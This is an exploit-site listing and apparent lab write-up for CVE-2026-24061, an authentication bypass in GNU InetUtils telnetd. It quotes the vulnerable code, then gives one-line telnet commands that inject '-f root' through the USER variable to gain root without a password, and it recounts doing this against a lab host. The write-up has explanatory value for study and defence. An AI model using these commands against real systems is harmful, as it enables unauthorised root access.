Exploit for Argument Injection in Gnu Inetutils CVE-2026-24061

Name: Exploit for Argument Injection in Gnu Inetutils CVE-2026-24061
Rating: 5 (4 reviews)
2026-06-08 | CVSS 9.8
## https://sploitus.com/exploit?id=B3B894F1-1A4A-555E-A82C-623DC073C025
## CVE-2026–24061 : GNU InetUtils telnetd Authentication Bypass Vulnerability



`CVE-2026–24061` is a critical weakness in the telnetd service of GNU InetUtils

**CVE ID :** CVE-2026–24061
**Severity :** Critical (CVSS 9.8)
**Attack Vector :** Network
**Authentication Required :** None
**Impact :** Full system compromise (root access)

The vulnerability originates from improper handling of the `USER environment variable` during the `Telnet session` setup, this value is directly forwarded into the argument list of `/usr/bin/login` **without any sanitization or validation and as a result, a remote attacker can manipulate this input to inject command-line options, effectively bypassing authentication and obtaining a root shell instantly** 



#### Vulnerable Code Snippet

The following snippet from `telnetd/utility_file.c` shows how user-supplied values were directly used without validation:

```c
case 'h':
  return xstrdup (remote_hostname);
case 'l':
  return xstrdup (local_hostname);
case 'L':
  return xstrdup (line);
case 't':
  q = strchr (line + 1, '/');
  if (q)
    q++;
  else
    q = line;
  return xstrdup (q);
case 'T':
  return terminaltype ? xstrdup (terminaltype) : NULL;
case 'u':
  return user_name ? xstrdup (user_name) : NULL;
case 'U':
  return getenv ("USER") ? xstrdup (getenv ("USER")) : xstrdup ("");
```



**Issue :**

User-controlled values *USER*, *terminaltype*, and *line* : are used without validation. Acopied directly into internal structures
Since these values can be influenced by a remote client via the Telnet protocol, **this creates a critical injection point**

**Attack flow :**

- Connect to the target telnetd service
- Use the Telnet NEW_ENVIRON option to set: **USER= " -f root"**
- The server processes this value without validation
- The injected flag is interpreted, potentially leading to authentication bypass or privilege escalation



**Proof of Concept**

A minimal proof of concept demonstrates how to exploit the vulnerability:

```bash
USER='-f root' telnet -a 
telnet -l -'f root' ip_addr
```

**This command injects a malicious USER value during the Telnet handshake, which can result in unauthorized root access on vulnerable systems**



### Practical lab :

I completed a lab involving `CVE-2026–24061`, where I exploited the vulnerability by using telnet -l '-f root' 176.16.2.153 to inject malicious arguments and achieve authentication bypass, ultimately gaining root-level access on the target system



**What happens internally :**

1 - **l :** refers to login name
2 - **'-f root'**: value paassed as the username, (-f : no password check - skip authentication), (root: target user))
3 - The vulnerable server does no sanitization
4 - It interprets -f as a flag instead of part of a username

This allowed me to inject malicious arguments, bypass authentication, and gain root-level access on the target system

**Technical Summary**

The flaw resides in how telnetd handles the NEW_ENVIRON Telnet option. It allows a client to define environment variables that are passed to the system's /usr/bin/login binary. Because telnetd fails to sanitize the USER variable, an attacker can inject the -f flag (force login), which tells the login utility to skip password verification and immediately grant a session for the specified user (typically root)